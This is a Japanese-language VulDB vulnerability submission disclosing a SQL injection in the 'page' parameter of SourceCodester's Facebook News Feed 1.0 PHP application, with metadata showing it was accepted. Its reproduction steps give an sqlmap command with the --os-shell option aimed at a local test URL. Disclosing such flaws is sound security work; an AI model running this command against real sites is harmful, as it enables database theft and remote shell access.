提出 #344502: SourceCodester facebook 1.0 SQL Injection情報

タイトルSourceCodester facebook 1.0 SQL Injection
説明# Exploit Title: Facebook News Feed - SQL Injection # Exploit Author: Raj # Vendor Name: oretnom23 # Vendor Homepage: https://www.sourcecodester.com/php/14602/facebook-news-feed-using-phpmysqli-source-code.html # Software Link: https://www.sourcecodester.com/php/14602/facebook-news-feed-using-phpmysqli-source-code.html # Version: v1.0 # Tested on: Windows 11, Apache Description:- A SQL Injection issue in Facebook News Feed allows to get an complete Remote Access into the website. Access such as database, files and everything. ` Payload used:- python sqlmap.py -u "http://localhost:8080/fb/index.php?page=home" --risk 2 --level 3 --os-shell ` Vulnerable Parameter:- ?page= ` Steps to reproduce:- 1. Here we take the GET method of "http://localhost:8080/fb/index.php?page=home" just this page only 2. In this we target our parameter as "page". 3. Now we are gonna use "SQLMap" tool and with this following command **python sqlmap.py -u "http://localhost:8080/fb/index.php?page=home" --risk 2 --level 3 --os-shell**
ユーザー
 Cyberraj (UID 59481)
送信2024年05月25日 15:08 (2 年 ago)
モデレーション2024年05月25日 20:25 (5 hours later)
ステータス承諾済み
VulDBエントリ266302 [SourceCodester Facebook News Feed Like 1.0 index.php page SQLインジェクション]
ポイント17

Do you need the next level of professionalism?

Upgrade your account now!